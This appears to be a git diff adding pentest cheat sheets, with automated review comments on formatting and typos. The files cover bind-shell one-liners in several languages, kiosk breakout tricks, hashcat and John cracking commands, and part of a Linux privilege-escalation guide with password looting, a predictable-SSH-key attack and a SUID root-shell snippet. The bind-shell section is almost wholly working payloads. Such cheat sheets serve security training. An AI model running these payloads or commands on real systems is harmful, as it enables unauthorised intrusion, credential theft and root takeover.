@@ -0,0 +1,95 @@ +# Bind Shell + +## Summary + +* [Bind Shell](#bind-shell) + * [Perl](#perl) + * [Python](#python) + * [PHP](#php) + * [Ruby](#ruby) + * [Netcat Traditional](#netcat-traditional) + * [Netcat OpenBsd](#netcat-openbsd) + * [Ncat](#ncat) + * [Socat](#socat) + * [Powershell](#powershell) + + +## Perl + +```perl +perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\ +bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\ +close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};' +``` + +## Python + +Single line : +```python +python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",51337));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' +``` + +Expanded version : + +```python +import socket as s,subprocess as sp; + +s1 = s.socket(s.AF_INET, s.SOCK_STREAM); +s1.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1); +s1.bind(("0.0.0.0", 51337)); +s1.listen(1); +c, a = s1.accept(); + +while True: + d = c.recv(1024).decode(); + p = sp.Popen(d, shell=True, stdout=sp.PIPE, stderr=sp.PIPE, stdin=sp.PIPE); + c.sendall(p.stdout.read()+p.stderr.read()) +``` + +## PHP + +```php +php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\ +socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\ +$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\ + socket_write($cl,$m,strlen($m));}}' +``` + +## Ruby + +```ruby +ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)' +``` + +## Netcat Traditional + +```powershell +nc -nlvp 51337 -e /bin/bash +``` + +## Netcat OpenBsd + +```powershell +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash 
-i 2>&1|nc -lvp 51337 >/tmp/f +``` + +## Socat + +```powershell +user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 +user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane +``` + +## Powershell + +```powershell +https://github.com/besimorhino/powercat + +# Victim (listen) +. .\powercat.ps1 +powercat -l -p 7002 -ep + +# Connect from attacker +. .\powercat.ps1 +powercat -c 127.0.0.1 -p 7002 +``` diff --git a/docs/pentest/Escape Breakout.md b/docs/pentest/Escape Breakout.md new file mode 100644 index 0000000..8fb8528 --- /dev/null +++ b/docs/pentest/Escape Breakout.md 
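Review bot: the `Summary` links to a `[Ncat](#ncat)` section that does not exist in the file (the body goes from `Netcat OpenBsd` straight to `Socat`), so either add the Ncat entry or drop the TOC line. The Python "Expanded version" keeps the one-liner's trailing semicolons on every statement (`import socket as s,subprocess as sp;`), which is legal but not idiomatic once the code is spread over lines. Fence tags: the `nc`, `socat` and `rm /tmp/f;mkfifo` blocks are shell commands but are tagged `powershell`, and the `Powershell` block opens with a bare URL inside the fence rather than in the prose above it.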
@@ -0,0 +1,152 @@ +# Application Escape and Breakout + +## Summary + +* [Gaining a command shell](#gaining-a-command-shell) +* [Sticky Keys](#sticky-keys) +* [Dialog Boxes](#dialog-boxes) + * [Creating new files](#creating-new-files) + * [Open a new Windows Explorer instance](#open-a-new-windows-explorer-instance) + * [Exploring Context Menus](#exploring-context-menus) + * [Save as](#save-as) + * [Input Boxes](#input-boxes) + * [Bypass file restrictions](#bypass-file-restrictions) +* [Internet Explorer](#internet-explorer) +* [Shell URI Handlers](#shell-uri-handlers) +* [References](#references) + +## Gaining a command shell + +* **Shortcut** + * [Window] + [R] -> cmd + * [CTRL] + [SHIFT] + [ESC] -> Task Manager + * [CTRL] + [ALT] + [DELETE] -> Task Manager +* **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\windows\system32\`), we can simply right click and `open` it +* **Drag-and-drop**: dragging and dropping any file onto the cmd.exe +* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe` +* **Task Manager**: `File` > `New Task (Run...)` > `cmd` +* **MSPAINT.exe** + * Open MSPaint.exe and set the canvas size to: `Width=6` and `Height=1` pixels + * Zoom in to make the following tasks easier + * Using the colour picker, set pixels values to (from left to right): + ```ps1 + 1st: R: 10, G: 0, B: 0 + 2nd: R: 13, G: 10, B: 13 + 3rd: R: 100, G: 109, B: 99 + 4th: R: 120, G: 101, B: 46 + 5th: R: 0, G: 0, B: 101 + 6th: R: 0, G: 0, B: 0 + ``` + * Save it as 24-bit Bitmap (*.bmp;*.dib) + * Change its extension from bmp to bat and run + + +## Sticky Keys + +* Spawn the sticky keys dialog + * Via Shell URI : `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` + * Hit 5 times [SHIFT] +* Visit "Ease of Access Center" +* You land on "Setup Sticky Keys", move up a level on "Ease of Access Center" +* Start the OSK (On-Screen-Keyboard) +* You can now use the keyboard shortcut (CTRL+N) + +## Dialog Boxes + +### Creating new files + +* Batch files 
– Right click > New > Text File > rename to .BAT (or .CMD) > edit > open +* Shortcuts – Right click > New > Shortcut > `%WINDIR%\system32` + +## Open a new Windows Explorer instance + +* Right click any folder > select `Open in new window` + +## Exploring Context Menus + +* Right click any file/folder and explore context menus +* Clicking `Properties`, especially on shortcuts, can yield further access via `Open File Location` + +### Save as + +* "Save as" / "Open as" option +* "Print" feature – selecting "print to file" option (XPS/PDF/etc) +* `\\127.0.0.1\c$\Windows\System32\` and execute `cmd.exe` + +### Input Boxes + +Many input boxes accept file paths; try all inputs with UNC paths such as `//attacker–pc/` or `//127.0.0.1/c$` or `C:\` + + +### Bypass file restrictions + +Enter *.* or *.exe or similar in `File name` box + +## Internet Explorer + +### Download and Run/Open + +* Text files -> opened by Notepad + +### Menus + +* The address bar +* Search menus +* Help menus +* Print menus +* All other menus that provide dialog boxes + +### Accessing filesystem + +Enter these paths in the address bar: + +* file://C:/windows +* C:/windows/ +* %HOMEDRIVE% +* \\127.0.0.1\c$\Windows\System32 + +### Unassociated Protocols + +It is possible to escape a browser based kiosk with other protocols than usual `http` or `https`. +If you have access to the address bar, you can use any known protocol (`irc`, `ftp`, `telnet`, `mailto`, etc.) +to trigger the *open with* prompt and select a program installed on the host. +The program will than be launched with the uri as a parameter, you need to select a program that will not crash when recieving it. +It is possible to send multiple parameters to the program by adding spaces in your uri. + +Note: This technique required that the protocol used is not already associated with a program. 
+ +Example - Launching Firefox with a custom profile: + +This is a nice trick since Firefox launched with the custom profile may not be as much hardened as the default profile. + +0. Firefox need to be installed. +1. Enter the following uri in the address bar: `irc://127.0.0.1 -P "Test"` +2. Press enter to navigate to the uri. +3. Select the firefox program. +4. Firefox will be launched with the profile `Test`. + +In this example, it's the equivalent of running the following command: +``` +firefox irc://127.0.0.1 -P "Test" +``` + + +## Shell URI Handlers + +* shell:DocumentsLibrary +* shell:Librariesshell:UserProfiles +* shell:Personal +* shell:SearchHomeFolder +* shell:System shell:NetworkPlacesFolder +* shell:SendTo +* shell:Common Administrative Tools +* shell:MyComputerFolder +* shell:InternetFolder + +## References + +* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/) +* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/) +* [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications) +* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/) +* [HOW TO LAUNCH COMMAND PROMPT AND POWERSHELL FROM MS PAINT - 2022-05-14 - Rickard](https://tzusec.com/how-to-launch-command-prompt-and-powershell-from-ms-paint/) \ No newline at end of file diff --git a/docs/pentest/Hash Cracking.md b/docs/pentest/Hash Cracking.md new file mode 100644 index 0000000..b3ea6f4 --- /dev/null +++ b/docs/pentest/Hash Cracking.md 
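Review bot: two list items in `Shell URI Handlers` have been run together: `shell:Librariesshell:UserProfiles` should be the two entries `shell:Libraries` and `shell:UserProfiles`, and `shell:System shell:NetworkPlacesFolder` should be `shell:System` and `shell:NetworkPlacesFolder`. Heading levels are inconsistent with the `Summary`: `Open a new Windows Explorer instance` and `Exploring Context Menus` are `##` headings while the TOC nests them under `Dialog Boxes` alongside `Creating new files` and `Save as`, so they should be `###`. In `Input Boxes` the sample UNC path `//attacker–pc/` contains an en dash rather than a hyphen. Typos in `Unassociated Protocols`: "will than be launched" (then), "recieving" (receiving), "This technique required that" (requires), and "Firefox need to be installed" (needs).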
@@ -0,0 +1,169 @@ +# Hash Cracking + +## Summary + +* [Hashcat](https://hashcat.net/hashcat/) + * [Hashcat Example Hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) + * [Hashcat Install](#hashcat-install) + * [Mask attack](#mask-attack) + * [Dictionary](#dictionary) +* [John](https://github.com/openwall/john) + * [Usage](#john-usage) +* [Rainbow tables](#rainbow-tables) +* [Tips and Tricks](#tips-and-tricks) +* [Online Cracking Resources](#online-cracking-resources) +* [References](#references) + + +## Hashcat + +### Hashcat Install + +```powershell +apt install cmake build-essential -y +apt install checkinstall git -y +git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install +``` + +1. Extract the hash +2. Get the hash format: https://hashcat.net/wiki/doku.php?id=example_hashes +3. Establish a cracking stratgy based on hash format (ex: wordlist -> wordlist + rules -> mask -> combinator mode -> prince attack -> ...) +4. Enjoy plains +5. Review strategy +6. Start over + +### Dictionary + +> Every word of a given list (a.k.a. dictionary) is hashed and compared against the target hash. 
+ +```powershell +hashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file -r $my_rules +``` + +* Wordlists + * [packetstorm](https://packetstormsecurity.com/Crackers/wordlists/) + * [weakpass_3a](https://download.weakpass.com/wordlists/1948/weakpass_3a.7z) + * [weakpass_3](https://download.weakpass.com/wordlists/1947/weakpass_3.7z) + * [Hashes.org](https://download.weakpass.com/wordlists/1931/Hashes.org.7z) + * [kerberoast_pws](https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz) + * [hashmob.net](https://hashmob.net/research/wordlists) + * [clem9669/wordlists](https://github.com/clem9669/wordlists) + +* Rules + * [One Rule to Rule Them All](https://notsosecure.com/one-rule-to-rule-them-all/) + * [nsa-rules](https://github.com/NSAKEY/nsa-rules) + * [hob064](https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule) + * [d3adhob0](https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule) + * [clem9669/hashcat-rule](https://github.com/clem9669/hashcat-rule) + +### Mask attack + +Mask attack is an attack mode which optimize brute-force. + +> Every possibility for a given character set and a given length (i.e. aaa, aab, aac, ...) is hashed and compared against the target hash. + +```powershell +# Mask: upper*1+lower*5+digit*2 and upper*1+lower*6+digit*2 +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?d?d +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?l?d?d +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?l?l?d?d?1 +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" 
?u?l?l?l?l?l?l?d?d?1 + +# Mask: upper*1+lower*3+digit*4 and upper*1+lower*3+digit*4 +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?d?d?d?d +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?d?d?d?d +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?d?d?d?d +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?d?d?d?d?1 +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?l?d?d?d?d?1 + +# Mask: lower*6 + digit*2 + special digit(+!?*) +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?l?l?l?l?l?l?d?d?1 +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?l?l?l?l?l?l?d?d?1?1 + +# Mask: lower*6 + digit*2 +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 /content/hashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1 + +# Other examples +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a?a +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a +hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?l?d?d?d?d +hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file "?a?a?a?a?a?a?a?a?a?a?a?a" +hashcat --attack-mode 3 --hash-type $number $hashes_file "?u?l?l?l?d?d?d?d?s" +hashcat --attack-mode 3 --hash-type $number $hashes_file "?a?a?a?a?a?a?a?a" +hashcat --attack-mode 3 --custom-charset1 "?u" --custom-charset2 "?l?u?d" --custom-charset3 "?d" --hash-type $number $hashes_file "?1?2?2?2?3" +``` + +| Shortcut | Characters | +|----|----------------------------| +| ?l | abcdefghijklmnopqrstuvwxyz | +| ?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ | +| ?d | 0123456789 | +| 
?s | !"#$%&'()*+,-./:;<=>?@[\]^_`{}~ | +| ?a | ?l?u?d?s | +| ?b | 0x00 - 0xff | + + + +## John + + +### John Usage + +```bash +# Run on password file containing hashes to be cracked +john passwd + +# Use a specific wordlist +john --wordlist= passwd + +# Use a specific wordlist with rules +john --wordlist= passwd --rules=Jumbo + +# Show cracked passwords +john --show passwd + +# Restore interrupted sessions +john --restore +``` + + +## Rainbow tables + +> The hash is looked for in a pre-computed table. It is a time-memory trade-off that allows cracking hashes faster, but costing a greater amount of memory than traditional brute-force of dictionary attacks. This attack cannot work if the hashed value is salted (i.e. hashed with an additional random value as prefix/suffix, making the pre-computed table irrelevant) + +## Tips and Tricks + +* Cloud GPU + * [penglab - Abuse of Google Colab for cracking hashes. 🐧](https://github.com/mxrch/penglab) + * [google-colab-hashcat - Google colab hash cracking](https://github.com/ShutdownRepo/google-colab-hashcat) + * [Cloudtopolis - Zero Infrastructure Password Cracking](https://github.com/JoelGMSec/Cloudtopolis) + * [Nephelees - also a NTDS cracking tool abusing Google Colab](https://github.com/swisskyrepo/Nephelees) +* Build a rig on premise + * [Pentester's Portable Cracking Rig - $1000](https://www.netmux.com/blog/portable-cracking-rig) + * [How To Build A Password Cracking Rig - 5000$](https://www.netmux.com/blog/how-to-build-a-password-cracking-rig) +* Online cracking + * [Hashes.com](https://hashes.com/en/decrypt/hash) + * [hashmob.net](https://hashmob.net/): great community with Discord +* Use the `loopback` in combination with rules and dictionary to keep cracking until you don't find new passsword: `hashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file` +* PACK (Password Analysis and Cracking Kit) + * https://github.com/iphelix/pack/blob/master/README + * Can produce 
custom hcmask files to use with hashcat, based on statistics and rules applied on an input dataset +* Use Deep Learning + * [brannondorsey/PassGAN](https://github.com/brannondorsey/PassGAN) + + +## Online Cracking Resources + +* [hashes.com](https://hashes.com) +* [crackstation](https://crackstation.net) +* [Hashmob](https://hashmob.net/) + + +## References + +* [Cracking - The Hacker Recipes](https://www.thehacker.recipes/ad-ds/movement/credentials/cracking) +* [Using Hashcat to Crack Hashes on Azure](https://durdle.com/2017/04/23/using-hashcat-to-crack-hashes-on-azure/) +* [miloserdov.org hashcat](https://miloserdov.org/?p=5426&PageSpeed=noscript) +* [miloserdov.org john](https://miloserdov.org/?p=4961&PageSpeed=noscript) +* [DeepPass — Finding Passwords With Deep Learning - Will Schroeder - Jun 1](https://posts.specterops.io/deeppass-finding-passwords-with-deep-learning-4d31c534cd00) \ No newline at end of file diff --git a/docs/pentest/Linux - Privilege Escalation.md b/docs/pentest/Linux - Privilege Escalation.md new file mode 100644 index 0000000..220931c --- /dev/null +++ b/docs/pentest/Linux - Privilege Escalation.md 
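Review bot: the comments in the Mask attack block do not describe the commands beneath them: the second comment repeats `# Mask: upper*1+lower*3+digit*4 and upper*1+lower*3+digit*4` although its three runs use lower*3, lower*4 and lower*5, and `# Mask: lower*6 + digit*2` sits above the `8char-1l-1u-1d-1s-compliant.hcmask` run and the `-1 ?l?d?u ?1?1?1?1?1?1?1?1` run, neither of which is lower*6+digit*2; reword each comment to match its masks (e.g. "8-char complexity-compliant masks from file" and "8 chars from lower/digit/upper"). The fences around `apt install`, `git clone ... make install` and the hashcat invocations are tagged `powershell` although they are Linux shell commands; tag them `bash` as the John block already is. In John Usage, `john --wordlist= passwd` and `john --wordlist= passwd --rules=Jumbo` have an empty option value, so write `--wordlist=<wordlist>`. Typos: "stratgy" → "strategy", "passsword" → "password", and in Rainbow tables "traditional brute-force of dictionary attacks" → "brute-force or dictionary attacks". The "Hashes.org" wordlist entry links to a weakpass.com download rather than hashes.org; either label it as the weakpass mirror or point it at the source.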
@@ -0,0 +1,832 @@ +# Linux - Privilege Escalation + +## Summary + +* [Tools](#tools) +* [Checklist](#checklists) +* [Looting for passwords](#looting-for-passwords) + * [Files containing passwords](#files-containing-passwords) + * [Old passwords in /etc/security/opasswd](#old-passwords-in-etcsecurityopasswd) + * [Last edited files](#last-edited-files) + * [In memory passwords](#in-memory-passwords) + * [Find sensitive files](#find-sensitive-files) +* [SSH Key](#ssh-key) + * [Sensitive files](#sensitive-files) + * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process) +* [Scheduled tasks](#scheduled-tasks) + * [Cron jobs](#cron-jobs) + * [Systemd timers](#systemd-timers) +* [SUID](#suid) + * [Find SUID binaries](#find-suid-binaries) + * [Create a SUID binary](#create-a-suid-binary) +* [Capabilities](#capabilities) + * [List capabilities of binaries](#list-capabilities-of-binaries) + * [Edit capabilities](#edit-capabilities) + * [Interesting capabilities](#interesting-capabilities) +* [SUDO](#sudo) + * [NOPASSWD](#nopasswd) + * [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd) + * [Doas](#doas) + * [sudo_inject](#sudo_inject) + * [CVE-2019-14287](#cve-2019-14287) +* [GTFOBins](#gtfobins) +* [Wildcard](#wildcard) +* [Writable files](#writable-files) + * [Writable /etc/passwd](#writable-etcpasswd) + * [Writable /etc/sudoers](#writable-etcsudoers) +* [NFS Root Squashing](#nfs-root-squashing) +* [Shared Library](#shared-library) + * [ldconfig](#ldconfig) + * [RPATH](#rpath) +* [Groups](#groups) + * [Docker](#docker) + * [LXC/LXD](#lxclxd) +* [Hijack TMUX session](#hijack-tmux-session) +* [Kernel Exploits](#kernel-exploits) + * [CVE-2022-0847 (DirtyPipe)](#cve-2022-0847-dirtypipe) + * [CVE-2016-5195 (DirtyCow)](#cve-2016-5195-dirtycow) + * [CVE-2010-3904 (RDS)](#cve-2010-3904-rds) + * [CVE-2010-4258 (Full Nelson)](#cve-2010-4258-full-nelson) + * [CVE-2012-0056 (Mempodipper)](#cve-2012-0056-mempodipper) + + +## Tools + 
+There are many scripts that you can execute on a linux machine which automatically enumerate sytem information, processes, and files to locate privilege escalation vectors. +Here are a few: + +- [LinPEAS - Linux Privilege Escalation Awesome Script](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) + + ```powershell + wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh + curl "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -o linpeas.sh + ./linpeas.sh -a #all checks - deeper system enumeration, but it takes longer to complete. + ./linpeas.sh -s #superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk. + ./linpeas.sh -P #Password - Pass a password that will be used with sudo -l and bruteforcing other users + ``` + +- [LinuxSmartEnumeration - Linux enumeration tools for pentesting and CTFs](https://github.com/diego-treitos/linux-smart-enumeration) + + ```powershell + wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh + curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh + ./lse.sh -l1 # shows interesting information that should help you to privesc + ./lse.sh -l2 # dump all the information it gathers about the system + ``` + +- [LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum) + + ```powershell + ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t + ``` + +- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) +- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) +- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) +- [Privilege Escalation through sudo - 
Linux](https://github.com/TH3xACE/SUDO_KILLER) + + +## Checklists + +* Kernel and distribution release details +* System Information: + * Hostname + * Networking details: + * Current IP + * Default route details + * DNS server information +* User Information: + * Current user details + * Last logged on users + * Shows users logged onto the host + * List all users including uid/gid information + * List root accounts + * Extracts password policies and hash storage method information + * Checks umask value + * Checks if password hashes are stored in /etc/passwd + * Extract full details for 'default' uid's such as 0, 1000, 1001 etc + * Attempt to read restricted files i.e. /etc/shadow + * List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.) + * Basic SSH checks +* Privileged access: + * Which users have recently used sudo + * Determine if /etc/sudoers is accessible + * Determine if the current user has Sudo access without a password + * Are known 'good' breakout binaries available via Sudo (i.e. nmap, vim etc.) 
+ * Is root's home directory accessible + * List permissions for /home/ +* Environmental: + * Display current $PATH + * Displays env information +* Jobs/Tasks: + * List all cron jobs + * Locate all world-writable cron jobs + * Locate cron jobs owned by other users of the system + * List the active and inactive systemd timers +* Services: + * List network connections (TCP & UDP) + * List running processes + * Lookup and list process binaries and associated permissions + * List inetd.conf/xined.conf contents and associated binary file permissions + * List init.d binary permissions +* Version Information (of the following): + * Sudo + * MYSQL + * Postgres + * Apache + * Checks user config + * Shows enabled modules + * Checks for htpasswd files + * View www directories +* Default/Weak Credentials: + * Checks for default/weak Postgres accounts + * Checks for default/weak MYSQL accounts +* Searches: + * Locate all SUID/GUID files + * Locate all world-writable SUID/GUID files + * Locate all SUID/GUID files owned by root + * Locate 'interesting' SUID/GUID files (i.e. nmap, vim etc) + * Locate files with POSIX capabilities + * List all world-writable files + * Find/list all accessible *.plan files and display contents + * Find/list all accessible *.rhosts files and display contents + * Show NFS server details + * Locate *.conf and *.log files containing keyword supplied at script runtime + * List all *.conf files located in /etc + * Locate mail +* Platform/software specific tests: + * Checks to determine if we're in a Docker container + * Checks to see if the host has Docker installed + * Checks to determine if we're in an LXC container + +## Looting for passwords + +### Files containing passwords + +```powershell +grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null +find . 
-type f -exec grep -i -I "PASSWORD" {} /dev/null \; +``` + +### Old passwords in /etc/security/opasswd + +The `/etc/security/opasswd` file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them. + +:warning: Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes + + +### Last edited files + +Files that were edited in the last 10 minutes + +```powershell +find / -mmin -10 2>/dev/null | grep -Ev "^/proc" +``` + +### In memory passwords + +```powershell +strings /dev/mem -n10 | grep -i PASS +``` + +### Find sensitive files + +```powershell +$ locate password | more +/boot/grub/i386-pc/password.mod +/etc/pam.d/common-password +/etc/pam.d/gdm-password +/etc/pam.d/gdm-password.original +/lib/live/config/0031-root-password +... +``` + +## SSH Key + +### Sensitive files + +``` +find / -name authorized_keys 2> /dev/null +find / -name id_rsa 2> /dev/null +... +``` + +### SSH Key Predictable PRNG (Authorized_Keys) Process + +This module describes how to attempt to use an obtained authorized_keys file on a host system. + +Needed : SSH-DSS String from authorized_keys file + +**Steps** + +1. Get the authorized_keys file. An example of this file would look like so: + +``` +ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ... +``` + +2. Since this is an ssh-dss key, we need to add that to our local copy of `/etc/ssh/ssh_config` and `/etc/ssh/sshd_config`: + +``` +echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config +echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshd_config +/etc/init.d/ssh restart +``` + +3. Get [g0tmi1k's debian-ssh repository](https://github.com/g0tmi1k/debian-ssh) and unpack the keys: + +``` +git clone https://github.com/g0tmi1k/debian-ssh +cd debian-ssh +tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2 +``` + +4. 
Grab the first 20 or 30 bytes from the key file shown above starting with the `"AAAA..."` portion and grep the unpacked keys with it as: + +``` +grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf' +dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub +``` + +5. IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do: + +``` +ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934 +``` + +And you should connect without requiring a password. If stuck, the `-vvv` verbosity should provide enough details as to why. + +## Scheduled tasks + +### Cron jobs + +Check if you have access with write permission on these files. +Check inside the file, to find other paths with write permissions. + +```powershell +/etc/init.d +/etc/cron* +/etc/crontab +/etc/cron.allow +/etc/cron.d +/etc/cron.deny +/etc/cron.daily +/etc/cron.hourly +/etc/cron.monthly +/etc/cron.weekly +/etc/sudoers +/etc/exports +/etc/anacrontab +/var/spool/cron +/var/spool/cron/crontabs/root + +crontab -l +ls -alh /var/spool/cron; +ls -al /etc/ | grep cron +ls -al /etc/cron* +cat /etc/cron* +cat /etc/at.allow +cat /etc/at.deny +cat /etc/cron.allow +cat /etc/cron.deny* +``` + +You can use [pspy](https://github.com/DominicBreuker/pspy) to detect a CRON job. 
+ +```powershell +# print both commands and file system events and scan procfs every 1000 ms (=1sec) +./pspy64 -pf -i 1000 +``` + + +## Systemd timers + +```powershell +systemctl list-timers --all +NEXT LEFT LAST PASSED UNIT ACTIVATES +Mon 2019-04-01 02:59:14 CEST 15h left Sun 2019-03-31 10:52:49 CEST 24min ago apt-daily.timer apt-daily.service +Mon 2019-04-01 06:20:40 CEST 19h left Sun 2019-03-31 10:52:49 CEST 24min ago apt-daily-upgrade.timer apt-daily-upgrade.service +Mon 2019-04-01 07:36:10 CEST 20h left Sat 2019-03-09 14:28:25 CET 3 weeks 0 days ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service + +3 timers listed. +``` + +## SUID + +SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is run, the uid will be changed by the owner one. If the file owner is `root`, the uid will be changed to `root` even if it was executed from user `bob`. SUID bit is represented by an `s`. + +```powershell +╭─swissky@lab ~ +╰─$ ls /usr/bin/sudo -alh +-rwsr-xr-x 1 root root 138K 23 nov. 
16:04 /usr/bin/sudo +``` + +### Find SUID binaries + +```bash +find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \; +find / -uid 0 -perm -4000 -type f 2>/dev/null +``` + +### Create a SUID binary + +| Function | Description | +|------------|---| +| setreuid() | sets real and effective user IDs of the calling process | +| setuid() | sets the effective user ID of the calling process | +| setgid() | sets the effective group ID of the calling process | + + +```bash +print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c +gcc -o /tmp/suid /tmp/suid.c +sudo chmod +x /tmp/suid # execute right +sudo chmod +s /tmp/suid # setuid bit +``` + + +## Capabilities + +### List capabilities of binaries + +```powershell +╭─swissky@lab ~ +╰─$ /usr/bin/getcap -r /usr/bin +/usr/bin/fping = cap_net_raw+ep +/usr/bin/dumpcap = cap_dac_override,cap_net_admin,cap_net_raw+eip +/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep +/usr/bin/rlogin = cap_net_bind_service+ep +/usr/bin/ping = cap_net_raw+ep +/usr/bin/rsh = cap_net_bind_service+ep +/usr/bin/rcp = cap_net_bind_service+ep +``` + +### Edit capabilities + +```powershell +/usr/bin/setcap -r /bin/ping # remove +/usr/bin/setcap cap_net_raw+p /bin/ping # add +``` + +### Interesting capabilities + +Having the capability =ep means the binary has all the capabilities. +```powershell +$ getcap openssl /usr/bin/openssl +openssl=ep +``` + +Alternatively the following capabilities can be used in order to upgrade your current privileges. 
